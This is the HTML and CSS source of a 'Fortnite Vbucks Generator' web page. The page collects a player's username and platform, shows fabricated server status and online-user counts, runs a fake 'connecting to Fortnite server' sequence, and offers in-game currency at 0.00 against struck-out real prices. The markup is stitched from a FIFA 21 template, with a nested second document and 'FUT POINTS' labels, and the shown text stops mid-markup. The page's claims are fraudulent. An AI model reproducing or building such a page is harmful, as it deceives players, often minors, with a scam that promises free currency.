<!DOCTYPE html>

<html><head>
<title>Fortnite Vbucks Generator New 2021</title>
<meta name="description" content="Fortnite Vbucks Generator New 2021">
<meta property="og:title" content="Fortnite Vbucks Generator New 2021">
<meta property="og:description" content="Fortnite Vbucks Generator New 2021">
<meta name="referrer" content="no-referrer">

<script src="6.4.1/bundle.min.js" integrity="sha384-THoc7rflwZFKTdZNgv6jLFFDn299Uv3t1SW5B4yGLvLiCRTYP9ys6vXZcMl95TQF" crossorigin="anonymous"></script>
<script>
    Sentry.init({
        dsn: 'https://e0e6a104cb354a09bf094a90e676ea13@o425163.ingest.sentry.io/5780930',
        tracesSampleRate: 0.01
    });
</script>
<script>
    (function (i, s, o, g, r, a, m) {
        i['GoogleAnalyticsObject'] = r;
        i[r] = i[r] || function () {
            (i[r].q = i[r].q || []).push(arguments)
        }, i[r].l = 1 * new Date();
        a = s.createElement(o), m = s.getElementsByTagName(o)[0];
        a.async = 1;
        a.src = g;
        m.parentNode.insertBefore(a, m)
    })(window, document, 'script', 'https://www.google-analytics.com/analytics.js', 'ga');


    
    ga('send', 'pageview');

</script>
<style>
        .header_blue {
            background: #1565c0;
            padding: 80px 0 20px;
            color: #fff;
            font-size: 48px;
            font-weight: 300;
            margin-bottom: 40px;
        }
        .header_text {
            margin-left: auto;
            margin-right: auto;
            width: 80%;
        }
        body{
            margin:0;
            font-family:Roboto, sans-serif;
            color:#444;
        }
        .unlockBtn:hover{
            box-shadow: 0 3px 6px rgba(0,0,0,.16), 0 3px 6px rgba(0,0,0,.23);
        }
        .unlockBtn {
            background: #2196f3;
            border: none;
            border-radius: 2px;
            box-shadow: 0 1px 3px rgba(0,0,0,.12), 0 1px 2px rgba(0,0,0,.24);
            min-height: 31px;
            min-width: 70px;
            padding: 2px 16px;
            text-align: center;
            text-shadow: none;
            text-transform: uppercase;
            -webkit-transition: all 280ms ease;
            transition: all 280ms ease;
            box-sizing: border-box;
            cursor: pointer;
            -webkit-appearance: none;
            display: inline-block;
            vertical-align: middle;
            font: 500 14px/31px Roboto,sans-serif!important;
            outline: 0!important;
            color:white;
        }
        .content-container{
            width:80%;margin:0 auto;
        }
        @font-face{font-family:'Roboto';font-style:normal;font-weight:300;src:local('Roboto Light'),local(Roboto-Light),url(s/roboto/v15/Pru33qjShpZSmG3z6VYwnRJtnKITppOI_IvcXXDNrsc.woff2) format("woff2");unicode-range:U+0100-024F,U+1E00-1EFF,U+20A0-20AB,U+20AD-20CF,U+2C60-2C7F,U+A720-A7FF}@font-face{font-family:'Roboto';font-style:normal;font-weight:300;src:local('Roboto Light'),local(Roboto-Light),url(s/roboto/v15/Hgo13k-tfSpn0qi1SFdUfVtXRa8TVwTICgirnJhmVJw.woff2) format("woff2");unicode-range:U+0000-00FF,U+0131,U+0152-0153,U+02C6,U+02DA,U+02DC,U+2000-206F,U+2074,U+20AC,U+2212,U+2215,U+E0FF,U+EFFD,U+F000}@font-face{font-family:'Roboto';font-style:normal;font-weight:500;src:local('Roboto Medium'),local(Roboto-Medium),url(s/roboto/v15/oOeFwZNlrTefzLYmlVV1UBJtnKITppOI_IvcXXDNrsc.woff2) format("woff2");unicode-range:U+0100-024F,U+1E00-1EFF,U+20A0-20AB,U+20AD-20CF,U+2C60-2C7F,U+A720-A7FF}@font-face{font-family:'Roboto';font-style:normal;font-weight:500;src:local('Roboto Medium'),local(Roboto-Medium),url(s/roboto/v15/RxZJdnzeo3R5zSexge8UUVtXRa8TVwTICgirnJhmVJw.woff2) format("woff2");unicode-range:U+0000-00FF,U+0131,U+0152-0153,U+02C6,U+02DA,U+02DC,U+2000-206F,U+2074,U+20AC,U+2212,U+2215,U+E0FF,U+EFFD,U+F000}
        body{
  background-image: url("uploads/160654902908d19382d13fc6cc4d0328e4d84491b6.jpg");
  background-size:cover;

  background-position: center;
  background-repeat: no-repeat;
  background-color: #0c1318;
  background-attachment: fixed;
}
.step0{
  height: 100%;
  width: 100%;
  background-image: radial-gradient(#099cf5, #0941b5);
  /* background-color: red; */
  z-index: 99;
  top: 0;
  left: 0;
  position: fixed;

}
.fortnite-logo{
  width:500px;
  left:50%;
  top:50%;
  position: absolute;
margin-left: -250px;
margin-top: -200px;
}
.loading-center{
  transform: scale(0.4);
  left:50%;
  top:50%;
  position: absolute;
margin-left: -40px;
margin-top: -200px;
}

.lds-roller {
  display: inline-block;
  position: relative;
  width: 80px;
  height: 80px;
}
.lds-roller div {
  animation: lds-roller 1.2s cubic-bezier(0.5, 0, 0.5, 1) infinite;
  transform-origin: 40px 40px;
}
.lds-roller div:after {
  content: " ";
  display: block;
  position: absolute;
  width: 7px;
  height: 7px;
  border-radius: 50%;
  background: #fff;
  margin: -4px 0 0 -4px;
}
.lds-roller div:nth-child(1) {
  animation-delay: -0.036s;
}
.lds-roller div:nth-child(1):after {
  top: 63px;
  left: 63px;
}
.lds-roller div:nth-child(2) {
  animation-delay: -0.072s;
}
.lds-roller div:nth-child(2):after {
  top: 68px;
  left: 56px;
}
.lds-roller div:nth-child(3) {
  animation-delay: -0.108s;
}
.lds-roller div:nth-child(3):after {
  top: 71px;
  left: 48px;
}
.lds-roller div:nth-child(4) {
  animation-delay: -0.144s;
}
.lds-roller div:nth-child(4):after {
  top: 72px;
  left: 40px;
}
.lds-roller div:nth-child(5) {
  animation-delay: -0.18s;
}
.lds-roller div:nth-child(5):after {
  top: 71px;
  left: 32px;
}
.lds-roller div:nth-child(6) {
  animation-delay: -0.216s;
}
.lds-roller div:nth-child(6):after {
  top: 68px;
  left: 24px;
}
.lds-roller div:nth-child(7) {
  animation-delay: -0.252s;
}
.lds-roller div:nth-child(7):after {
  top: 63px;
  left: 17px;
}
.lds-roller div:nth-child(8) {
  animation-delay: -0.288s;
}
.lds-roller div:nth-child(8):after {
  top: 56px;
  left: 12px;
}
@keyframes lds-roller {
  0% {
    transform: rotate(0deg);
  }
  100% {
    transform: rotate(360deg);
  }
}

.status{
padding-top:10px;
position:absolute;
display: flex;
justify-content: center;
text-align: center;
  position: relative;
  height: 50px;
  width: 100%;
  background: transparent;

}
.platform-icon{
  width: 80px;
}
.scale-up-ver-center{-webkit-animation:scale-up-ver-center .4s cubic-bezier(.39,.575,.565,1.000) both;animation:scale-up-ver-center .4s cubic-bezier(.39,.575,.565,1.000) both}
@-webkit-keyframes scale-up-ver-center{0%{-webkit-transform:scaleY(.4);transform:scaleY(.4)}100%{-webkit-transform:scaleY(1);transform:scaleY(1)}}@keyframes scale-up-ver-center{0%{-webkit-transform:scaleY(.4);transform:scaleY(.4)}100%{-webkit-transform:scaleY(1);transform:scaleY(1)}}

.text-ligh{
opacity: 0.4;
}
.text-white{
  color:#14192a;
}
.server-status{

position: relative;
width:150px;
height: 33px;
padding-top:7px;
background-color: #fff701;
font-size: 12px;
line-height: 0.5;

}
.cut-rightstatus{

  width:10px;
  height: 30px;
  background: transparent;
  box-sizing: border-box;
  border-right: 10px solid #fff701;
  border-top: 40px solid transparent;
}
.cut-leftstatus{
  width:10px;
  height: 30px;
  background: transparent;
  box-sizing: border-box;
  border-left: 10px solid #fff701;
  border-bottom: 40px solid transparent;
}







section{

  align-self: center;
  text-align: center;
  align-items: center;
  display: flex;

justify-content: center;
align-items: center;
text-align: center;
  position: relative;
  height: 80px;
  width: 100%;
  background: transparent;
z-index: 2;
  }

  .recent-box{
    margin-top: 40px;
    align-self: center;
    text-align: center;
    align-items: center;
    display: flex;

  justify-content: center;
  align-items: center;
  text-align: center;
    position: relative;
    height: 40px;
    width: 100%;
    background: transparent;
  z-index: 2;
  }
  .select-fut-coin{

    align-self: center;
    text-align: center;
    align-items: center;
    display: flex;

  justify-content: center;
  align-items: center;
  text-align: center;
    position: relative;
    height: 40px;
    width: 100%;
    background: transparent;
  z-index: 2;
  }
  .text-recent{

    position: relative;

    color: #14192a;
        font-size: 22px;
        background-color: #fff701;

    }

  .text-entername{

    position: relative;

    color: white;
        font-size: 28px;
        background-color: #58c3db;
        height: 50px;
    width: 450px;
    padding-top: 20px;

    }
    .text-connectToServer
  {
    position: relative;

    color: #181f27;
        font-size: 25px;
        background-color: #58c3db;
        height: 50px;
    width: 450px;
    padding-top: 20px;
  }
  .cut-right{
    width:20px;
    height: 50px;
    background: transparent;
    box-sizing: border-box;
    border-left: 30px solid #58c3db;
    border-bottom: 70px solid transparent;
  }
  .cut-left{
    width:20px;
    height: 50px;
    background: transparent;
    box-sizing: border-box;
    border-right: 30px solid #58c3db;
    border-top: 70px solid transparent;
  }


  .cut-rightRecent{
    width:20px;
    height: 30px;
    background: transparent;
    box-sizing: border-box;
    border-left: 30px solid #fff701;
    border-bottom: 40px solid transparent;
  }
  .cut-leftRecent{
    width:20px;
    height: 30px;
    background: transparent;
    box-sizing: border-box;
    border-right: 30px solid #fff701;
    border-top: 40px solid transparent;
  }
.recentActivity{
  width:400px;
  height: 100px;
  background-color: #000000c9;
  position: relative;
  margin-top: 10px;
  padding: 10px;
}
.recent-card{

  background-color: white;
  width:100%;
  height: 100%;
}
.activity-pro{
  margin-top: 5px;
  width: 90%;

  height: 20px;
  position: relative;
  z-index: 1
}
.pro-step1{
  width: 10px;
  height: 10px;
  background-color: #b8b8b8;
  border-radius: 50%;
  position: absolute;
  left:5px;
  top:15px;
  z-index: 1;
}
.pro-step2{
  width: 10px;
  height: 10px;
  background-color: #b8b8b8;
  border-radius: 50%;
  position: absolute;
  left:50%;
  top:15px;
  z-index: 1;
}

.pro-step3{
  width: 10px;
  height: 10px;
  background-color: #b8b8b8;
  border-radius: 50%;
  position: absolute;
  right:5px;
  top:15px;
  z-index: 1;
}
.pro-bgbar{
  height: 2px;
  width: 340px;
  background-color: #b8b8b8;
  position: absolute;
  left: 10px;
  top:19px;
  overflow: hidden;
}
.progress-bar{
  height: 2px;
  width: 100%;
  background-color: #58c3db;
  position: absolute;
}
.loading{
  background-image: url("uploads/16065477944c50af0438af3e56a012ee489fbfa465.png");
  width: 12px;
  height: 12px;
background-size: contain;
display: inline-block;
margin-right:  2px;
animation: Aniloading 1s linear infinite;
}
@keyframes Aniloading {
  100% {transform: rotate(360deg);}
}


.loading-connectToServer{
  background-image: url("uploads/16065477944c50af0438af3e56a012ee489fbfa465.png");
  width: 20px;
  height: 20px;
  margin-bottom: -5px;
background-size: contain;
display: inline-block;
margin-right:  2px;
animation: Aniloading 1s linear infinite;
}
@keyframes Aniloading {
  100% {transform: rotate(360deg);}
}


.logo{
  width:200px;
  margin-top: 30px;
  }

  @font-face {
    font-family: 'EASPORTS';
    src: url('easports1.eot');
    src: url('easports1.eot?#iefix') format('embedded-opentype'),
         url('easports1.woff') format('woff'),
         url('easports1.ttf') format('truetype'),
         url('easports1.svg#EASPORTS') format('svg');
  }

  .fontpro,.fontpro-17694 {
    font-family: 'EASPORTS',Goldman;
    font-weight: 800;
  }
.text-gen{
  color: #58c3db;
  font-size: 40px;
  margin-top: -30px;
  text-shadow: 0 0 10px black;
  font-weight: bolder;
}

.userbox{
  margin-top: 40px;
  width: 650px;
  height: 70px;
  background-color: #000000c9;
  position: relative;
  padding: 20px;
  overflow: hidden;
  animation: mymove 2s linear infinite;
    }
  @keyframes mymove {
    10% {box-shadow: 0px 0px 10px #58c3db;
    }
20% {box-shadow: 0px 0px 40px #58c3db;}
30% {box-shadow: 0px 0px 60px #58c3db;}
40% {box-shadow: 0px 0px 80px #58c3db;}
50% {box-shadow: 0px 0px 100px #58c3db;}
  }
.platform{
  cursor: pointer;
  padding-top: 10px;
  height: auto;
  overflow: hidden;
  padding-bottom: 10px;
  width: 113px;
  margin-left: 0px;
color: white;
  background-color: #000000c9;
display: inline-block;

}
.img-platform{
  -webkit-filter: grayscale(100%);
  filter: grayscale(50%);
}
.platform1{
  padding-top: 10px;
  height: auto;
  overflow: auto;
  padding-bottom: 10px;
  width: 113px;
  margin-left: 0px;
  color: black;
  background-color: white;
  /* border-style: solid; */
  /* border-color: #ffff00; */
  display: inline-block;
  /* box-shadow: 0 0 10px #fff701;*/

}

.platform:hover{
   animation: pulse 0.5s ease-in infinite;
}
@keyframes pulse{
  25%  {transform: scale(0.9);}
  75%  {transform: scale(1);}
}
.platformbox{
  margin-top: 20px;
  width: 100%;
  height: auto;
  background: transparent;
  position: relative;
  overflow: auto;
}
.styled-input {
    width: 100%;
    background: transparent;
    border: none;
    border-bottom: 2px solid #43e4ee45;
    box-shadow: none;
    padding-left: 50px;
    height: auto;
    color: #fff;
    font-size: 3em;
    outline: none ;
    font-weight: 700;
}
.iconinput{
  position: absolute;
    width: 45px;
    left: 20px;
    top: 20px;
}
.bnt-continue{
  box-shadow: 0 0 10px #181f27;
  margin-top: 20px;
  width: 200px;
  background-color: #ff0;
  padding-top: 20px;
  padding-bottom: 20px;
  color: #1c1c1c;
  font-size: 22px;
  cursor: pointer;
  animation: mybutton 2s infinite;
    }
  @keyframes mybutton {
    10% {box-shadow: 0px 0px 2px #ff0;
    }
20% {box-shadow: 0px 0px 8px #ff0;}
30% {box-shadow: 0px 0px 2px #ff0;}
40% {box-shadow: 0px 0px 8px #ff0;}
50% {box-shadow: 0px 0px 2px #ff0;}
60% {box-shadow: 0px 0px 8px #ff0;}
70% {box-shadow: 0px 0px 2px #ff0;}
80% {box-shadow: 0px 0px 8px #ff0;}
90% {box-shadow: 0px 0px 2px #ff0;}
100% {box-shadow: 0px 0px 8px #ff0;}

  }

.step2{

      min-height: 100%;
      width: 100%;
      height: auto;
      margin: 0px;
      z-index: 99;
      top: 0px;
      left: 0px;
      position: absolute;
      /* background-color: #58c3dbf0; */
      background-image: linear-gradient(45deg, #9bedfff0, #58c3db);
      padding-top: 20px;
      background-size: contain;
      background-attachment: fixed;
}
.playername{
  height: 120px;
  margin: 20px;
  border-width: 1px;
  border-color: #03a7dc;
  padding-top: 10px;
  overflow: auto;
  padding-bottom: 10px;
  width: 170px;
  margin-left: 0px;
  color: black;
  background-color: white;
  border-style: solid;
  box-shadow: 0 0 5px #03a7dc;
  display: inline-block;
  font-size: 12px;
}
.final-progress-bar{
  margin-top: 100px;
  /* bottom: 10px; */
  height: 200px;
  width: 100%;
  background-color: transparent;
  position: relative;
}
.bgfinal-progress-bar{
  width: 300px;
  height: 40px;
  background-color: white;
  text-align: left;

}
.finalProgress-bar{

  text-align: center;
  width: 0%;
  height: 40px;
  background-color: #58c3db;
  box-shadow: 0 0 10px #58c3db;

}
.pro-gen{
  margin-left: 20px;
  margin-right: 20px;
  margin-bottom: 20px;
  border-width: 1px;
  border-color: #58c3db;

  overflow: auto;
  padding-bottom: 10px;
  width: 365px;
  margin-left: 0px;
  color: white;
  background-color: #58c3db;
  border-style: solid;
  box-shadow: 0 0 5px #03a7dc;
  display: inline-block;
  font-size: 12px;
  animation: myPromove 2s linear infinite;
    }
  @keyframes myPromove {
    10% {box-shadow: 0px 0px 10px #58c3db;
    }
20% {box-shadow: 0px 0px 40px #58c3db;}
30% {box-shadow: 0px 0px 60px #58c3db;}
40% {box-shadow: 0px 0px 80px #58c3db;}
50% {box-shadow: 0px 0px 100px #58c3db;}
  }
.fut-card{
  margin-top: 20px;
}
.card1{
    cursor: pointer;
  color:white;
  margin: 10px;
  height: 250px;
  width: 180px;
  background-color: #0008084a;
  border-style: solid;
  border-width: 1px;
  border-color:#fff701;

  display: inline-block;
}
.text-price{
  font-size:22px;
}
.card1:hover{
  border-color:#8df793;
    box-shadow: 0 0 5px #8df793;
  background-color: white;
  color: black;
  animation: myloading 0.1s linear;
  animation-fill-mode: forwards;
  }
  @keyframes myloading {
    0% {transform: scale(1);}
    100% {transform: scale(1.1);}
  }
  .hideform{
    animation: hideform 1s linear;
    animation-fill-mode: forwards;
  }
  @keyframes hideform {
    0% {transform: scale(1);}
    100% {transform: scale(0);height: 0px;padding:0px;margin: 0px;}

  }
  .showform{
    animation: showform 1s linear;
    animation-fill-mode: forwards;
  }
  @keyframes showform {
    0% {transform: scale(0);}
    100% {transform: scale(1);}
  }
.card2{
    cursor: pointer;
  margin: 10px;
  height: 250px;
  width: 180px;
  background-color: #0095ed;
  border-style: solid;
  color: white;
  border-style: solid;
  border-width: 1px;
  border-color:#0095ed;
  display: inline-block;
}
.vbucks-card1{

  background-image: url(uploads/16065490885eaa27b6d0e8f2179caf0b4dad61502f.jpg);

  /* background-color: red; */
  background-size: cover;
  display: inline-block;
}
.vbucks-card2{

  background-image: url(uploads/160654908816d25e78ee55b4a0bae79f6886727cd9.jpg);

  /* background-color: red; */
  background-size: cover;
  display: inline-block;
}
.vbucks-card3{

  background-image: url(uploads/1606549089b0c369873bd32e5442dd85dca43e3d64.jpg);

  /* background-color: red; */
  background-size: cover;
  display: inline-block;
}
.vbucks-card4{

  background-image: url(uploads/160654908961a7e003a67d08d512156643de8ecfc0.jpg);

  /* background-color: red; */
  background-size: cover;
  display: inline-block;
}
.vbucks-card-size{
  width: 200px;
  height: 348px;
}
.vbucks-card1:hover{

background-image: url(uploads/16065490870acfeababa356d27d6e34197604c3209.jpg);

/* background-color: red; */
background-size: cover;
  animation: vbuckcard 0.1s linear;
  animation-fill-mode: forwards;
  cursor: pointer;
  }
  .vbucks-card2:hover{

  background-image: url(uploads/1606549087a1ae712a02f37b2bf07f8235a7f15cc2.jpg);

  /* background-color: red; */
  background-size: cover;
    animation: vbuckcard 0.1s linear;
    animation-fill-mode: forwards;
    cursor: pointer;
    }
    .vbucks-card3:hover{

    background-image: url(uploads/1606549087ba2a29697f174412479c80eb4ab77c41.jpg);

    /* background-color: red; */
    background-size: cover;
      animation: vbuckcard 0.1s linear;
      animation-fill-mode: forwards;
      cursor: pointer;
      }
      .vbucks-card4:hover{

      background-image: url(uploads/1606549088a43ed29c99c57a9e11a6c1883f17247b.jpg);

      /* background-color: red; */
      background-size: cover;
        animation: vbuckcard 0.1s linear;
        animation-fill-mode: forwards;
        cursor: pointer;
        }
  @keyframes vbuckcard {
    0% {transform: translateY(0);}
    100% {transform: translateY(-10px);}
  }
.card2:hover{
  border-color:#c9ad58;
    box-shadow: 0 0 5px #c9ad58;
  background-color: white;
  color: black;
  animation: myloading 0.1s linear;
  animation-fill-mode: forwards;
  }
  @keyframes myloading {
    0% {transform: scale(1);}
    100% {transform: scale(1.1);}
  }
.rotate-in-hor{
  animation:rotate-in-hor 1s linear ;
  animation-fill-mode: forwards;

}
@keyframes rotate-in-hor{
  0%{margin-top:250px;}
100%{margin-top: -24px;}
}
.progress70{
  animation:progress-70 14s linear ;
  animation-fill-mode: forwards;
}
@keyframes progress-70{
  0%{width:0%;}
100%{width: 90%;}
}
.rotate-in-diag-2{
animation:rotate-in-diag-2 .5s cubic-bezier(.25,.46,.45,.94) both
}
@keyframes rotate-in-diag-2{0%{transform:rotate3d(-1,1,0,-360deg);opacity:0}100%{transform:rotate3d(-1,1,0,0deg);opacity:1}}


.flip-in-hor-bottom{
  animation:flip-in-hor-bottom 0.3s linear;
  animation-fill-mode: forwards;
}
@keyframes flip-in-hor-bottom{
  0%{transform:rotate(0deg);}
  50%{transform:rotate(20deg);}
75%{transform:rotate(-20deg);}
100%{transform:rotate(0deg);}
}

@media only screen and (max-width:730px) {
  .vbucks-card-size{
    width: 140px;
    height: 243px;
  }
  .platform{
    padding-top: 10px;
    padding-bottom:10px;
    width: 94px;
    margin-left: 0px;
  }
  .platform1{
    padding-top: 10px;
    padding-bottom: 10px;
    width: 94px;
  }
  .userbox{
    margin-top: 20px;
    width: 526px;
    height: 50px;
    background-color: #000000c9;
    position: relative;
    padding: 20px;
      }
      .styled-input {
          width: 100%;
          background: transparent;
          border: none;
          border-bottom: 2px solid #43e4ee45;
          box-shadow: none;
          padding-left: 50px;
          height: auto;
          color: #fff;
          font-size: 36px;
          outline: none ;
          font-weight: 700;
      }
      .iconinput{
        position: absolute;
          width: 40px;
          left: 20px;
          top: 20px;
      }
      .card1{
        margin: 10px;
        height: 180px;
        width: 120px;
        font-size: 10px;
      }
      .text-price{
        font-size:16px;
        margin: 0px;
      }
      .card2{
        margin: 10px;
        height: 180px;
        width: 120px;
        font-size: 10px;
      }
      .text-price{
        font-size:16px;
        margin: 0px;
      }
      .text-gen{
        color: #58c3db;
            font-size: 28px;
            margin-top: -15px;
          text-shadow: 0 0 15px black;
      }
      .final-progress-bar{
        margin-top: 50px;
        }
}
@media only screen and (max-width:600px) {
  .fortnite-logo{
    width:300px;
    left:50%;
    top:50%;
    position: absolute;
  margin-left: -150px;
  margin-top: -100px;
  }
  .loading-center{
    transform: scale(0.4);
    left:50%;
    top:50%;
    position: absolute;
  margin-left: -40px;
  margin-top: -30px;
  }
  .platform-icon{
    width: 60px;
  }
  .platform{
    padding-top: 10px;
    padding-bottom:10px;
    width: 90%;
    margin-left: 0px;
  }
  .platform1{
    padding-top: 10px;
    padding-bottom: 10px;
    width: 90%;
  }
  .userbox{
    margin-top: 20px;
    width: 526px;
    height: 60px;
    background-color: #000000c9;
    position: relative;
    padding: 20px;
      }
      .userbox{
        margin-top: 20px;
        width: 85%;
        height: 40px;
        background-color: #000000c9;
        position: relative;
        padding: 20px;
          }
          .styled-input {
              width: 100%;
              background: transparent;
              border: none;
              border-bottom: 2px solid #43e4ee45;
              box-shadow: none;
              padding-left: 30px;
              height: auto;
              color: #fff;
              font-size: 26px;
              outline: none ;
              font-weight: 700;
          }
          .iconinput{
            position: absolute;
              width: 30px;
              left: 20px;
              top: 20px;
          }

          .logo{
            width:160px;
            margin-top: 10px;
            }
            .text-gen{
              color: #58c3db;
                  font-size: 30px;
                  margin-top: -15px;
                text-shadow: 0 0 15px black;
            }
            .text-entername{
              position: relative;

              color: white;
                  font-size: 20px;
                  background-color: #58c3db;
                  height: 40px;
              width: 450px;
              padding-top: 20px;

              }
              .text-connectToServer
            {
              position: relative;

              color: #181f27;
                  font-size: 20px;
                  background-color: #58c3db;
                  height: 45px;
              width: 450px;
              padding-top: 15px;
            }
            .cut-right{
              width:20px;
              height: 50px;
              background: transparent;
              box-sizing: border-box;
              border-left: 30px solid #58c3db;
              border-bottom: 60px solid transparent;
            }
            .cut-left{
              width:20px;
              height: 50px;
              background: transparent;
              box-sizing: border-box;
              border-right: 30px solid #58c3db;
              border-top: 60px solid transparent;
            }
            .recentActivity{
              width:90%;
              height: 100px;
              background-color: #000000c9;
              position: relative;
              margin-top: 10px;
              padding: 10px;
            }
            .pro-bgbar{
              height: 2px;
              width: 95%;
              background-color: #b8b8b8;
              position: absolute;
              left: 10px;
              top:19px;
              overflow: hidden;
            }
            .progress-bar{
              height: 2px;
              width: 100%;
              background-color: #58c3db;
              position: absolute;
            }


            .card1{
              margin: 10px;
              height: 180px;
              width: 40%;
              font-size: 10px;
            }
            .text-price{
              font-size:16px;
              margin: 0px;
            }
            .card2{
              margin: 10px;
              height: 180px;
              width: 40%;
              font-size: 10px;
            }
            .text-price{
              font-size:16px;
              margin: 0px;
            }
            .text-gen{
              color: #58c3db;
                  font-size: 26px;
                  margin-top: -15px;
                text-shadow: 0 0 15px black;
            }
            .final-progress-bar{
              margin-top: 50px;
              }
              .playername{
                height: 110px;
                margin: 0px;
                margin-left: 0px;
                border-width: 1px;
                border-color: #03a7dc;
                padding-top: 0px;
                overflow: hidden;
                padding-bottom: 0px;
                width: 40%;
                margin-left: 5px;
                color: black;
                background-color: white;
                border-style: solid;
                box-shadow: 0 0 5px #03a7dc;
                display: inline-block;
                font-size: 12px;
              }
              .pro-gen{
                height: 100px;
                margin: 0px;
                margin-left: 0px;
                border-width: 1px;
                  border-color: #58c3db;
                padding-top: 0px;
                overflow: auto;
                padding-bottom: 0px;
                width: 82%;
                margin-left: 5px;
                font-size: 12px;
              }
              .recent-box{
                margin-top: 10px;
              }

}
@media only screen and (max-width:400px) {
  .text-entername{
    position: relative;

    color: white;
        font-size: 16px;
        background-color: #58c3db;
        height: 40px;
    width: 450px;
    padding-top: 20px;

    }
    .text-connectToServer
  {
        font-size: 16px;

  }
}

    </style>
<meta name="viewport" content="width=device-width, initial-scale=1.0">
</head>
<body>
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="ie=edge">
<title>FIFA 21 </title>
<link rel="stylesheet" type="text/css" href="style.css">
<link rel="stylesheet" href="css.css?family=Anton">
<link rel="stylesheet" href="css-1.css?family=Goldman">
</head>
<body>
<div class="step0" id="step0">
<img src="uploads/1606549681f611774b7803454b5c2826898a60ade5.png" class="fortnite-logo">
<div class="lds-roller loading-center"><div></div><div></div><div></div><div></div><div></div><div></div><div></div><div></div></div>
</div>
<center><img src="uploads/16065477942f839a5327de29e66dc66fe2920f472f.png" class="logo scale-up-ver-center">
<div class="text-gen fontpro scale-up-ver-center">VBUCK GENERATOR</div>
<div class="status fontpro scale-up-ver-center">
<div class="cut-rightstatus"></div>
<div class="server-status">
<span class="text-ligh">Status </span>
<p><span class="text-white">ONLINE</span></p>
</div>
<div class="cut-leftstatus"></div>
<div class="cut-rightstatus"></div>
<div class="server-status">
<span class="text-ligh">Last Update</span>
<p><span class="text-white" id="update">NOV 22 2020</span></p>
</div>
<div class="cut-leftstatus"></div>
<div class="cut-rightstatus"></div>
<div class="server-status">
<span class="text-ligh">USER ONLINE</span>
<p><span class="text-white" id="user-online">594</span></p>
</div>
<div class="cut-leftstatus"></div>
</div>
<div id="step1" style="filterKK:blur(5px)">
<section class=" scale-up-ver-center" style="margin-top:30px;">
<div class="cut-left"></div>
<div class="text-entername fontpro">Your Username And Platform
</div>
<div class="cut-right"></div>
</section>
<div class="userbox fontpro" id="userbox">
<img src="uploads/1606549774a423df82dc403a954778a2fb2dc63ffc.png" class="iconinput fontpro scale-up-ver-center"><input type="text" id="fut-username" class="styled-input" placeholder="Fortnite Username...">
</div>
<div class="platformbox fontpro scale-up-ver-center" id="platformbox">
<div class="platform1 fontpro" id="platform1" onclick="platform('platform1')">
<img src="uploads/16065477956bf3c78471adcad907b99ecf02e3fe44.png" id="img-platform1" class="platform-icon" style="filter:invert(1)">
</div>
<div class="platform fontpro" id="platform2" onclick="platform('platform2')">
<img src="uploads/16065477959c21fdc023c8c086d44642260316b8e2.png" id="img-platform2" class="platform-icon">
</div>
<div class="platform fontpro" id="platform3" onclick="platform('platform3')">
<img src="uploads/1606547795c0af81693eb30509325ff7a176f84035.png" id="img-platform3" class="platform-icon">
</div>
<div class="platform fontpro" id="platform4" onclick="platform('platform4')">
<img src="uploads/1606547796aa97bfd1d29ffb269b62bc7c961202f5.png" id="img-platform4" class="platform-icon">
</div>
<div class="platform fontpro" id="platform5" onclick="platform('platform5')">
<img src="uploads/1606547796fc27cf812d94b7ffd4f2df0534c0de19.png" id="img-platform5" class="platform-icon">
</div>
<div class="platform fontpro" id="platform6" onclick="platform('platform6')">
<img src="uploads/1606549666523b2166f158529002556e773e887baf.png" id="img-platform6" class="platform-icon">
</div>
</div>
<div class="bnt-continue fontpro scale-up-ver-center" onclick="bntContinue()">Continue</div>
</div>
<div id="step2" class="step2" style="display:none">
<section id="section" style="margin-top:250px;">
<div class="cut-left"></div>
<div class="text-connectToServer fontpro" id="connecting-to-server"> connecting to Fortnite server <div class="loading-connectToServer" id="connectToServer-loading"></div>
</div>
<div class="cut-right"></div>
</section>
<div id="player-info" style="display:none;margin-bottom:20px;">
<div class="recent-box" style="margin-bottom:10px;">
<div class="cut-leftRecent"></div>
<div class="text-recent fontpro" style="height: 20px; width: 250px; padding: 10px;">Your Info
</div>
<div class="cut-rightRecent"></div>
</div>
<div class="playername fontpro">
<p style="color:#141d3c">Player Name</p>
<p><img src="uploads/1606549774a423df82dc403a954778a2fb2dc63ffc.png" style="width:30px;"></p>
<div id="selected-username" style="font-size:18px">user</div>
</div>
<div class="playername fontpro">
<p style="color:#141d3c">Platform</p>
<p><img src="uploads/16065477956bf3c78471adcad907b99ecf02e3fe44.png" style="width:60px;filter:invert(1)" id="selected-platform"></p>
</div>
<div class="generator">
<div class="pro-gen fontpro" id="card-point-gen" style="display:none">
<p><img src="img/point.png" style="width:70px;"></p>
<div id="point-gen" style="font-size:24px;">2 600</div>
</div>
<div class="pro-gen fontpro" id="card-coin-gen" style="display:none">
<p><img src="uploads/160654779431bbf96cc8b1d488a5b7d0b40896c1bc.png" style="width:70px;"></p>
<div id="coin-gen" style="font-size:24px;">100 000 000</div>
</div>
</div>
</div>
<div id="select-fut-point" class="rotate-in-diag-2" style="display:none">
<div class="select-fut-coin">
<div class="cut-leftRecent"></div>
<div class="text-recent fontpro" style="height: 20px; width: 250px; padding: 10px;font-size:18px">Select V-Buck Amount </div>
<div class="cut-rightRecent"></div>
</div>
<div class="fut-card fontpro">
<div class="card1" onclick="pointsSelect(1600)">
<img src="img/icon.png">
<p style="color:#ff2148;"><img src="img/point.png" style="width:30px;margin-bottom:-5px;"> 1 600 FUT POINTS
</p><p><img src="img/point.png" style="width:75px;"></p>
<p class="text-price">0.00</p>
<p style="color:#afafaf;text-decoration: line-through">14.99</p>
</div>
<div class="card1" onclick="pointsSelect(2200)">
<img src="img/icon.png">
<p style="color:#ff2148;"><img src="img/point.png" style="width:30px;margin-bottom:-5px;"> 2 200 FUT POINTS
</p><p><img src="img/point.png" style="width:75px;"></p>
<p class="text-price">0.00</p>
<p style="color:#afafaf;text-decoration: line-through">19.99</p>
</div>
<div class="card1" onclick="pointsSelect(4600)">
<img src="img/icon.png">
<p style="color:#ff2148;"><img src="img/point.png" style="width:30px;margin-bottom:-5px;"> 4 600 FUT POINTS
</p><p><img src="img/point.png" style="width:75px;"></p>
<p class="text-price">0.00</p>
<p style="color:#afafaf;text-decoration: line-through">39.99</p>
</div>
<div class="card1" onclick="pointsSelect(12000)">
<img src="img/icon.png">
<p style="color:#ff2148;"><img src="img/point.png" style="width:30px;margin-bottom:-5px;"> 12 000 FUT POINTS
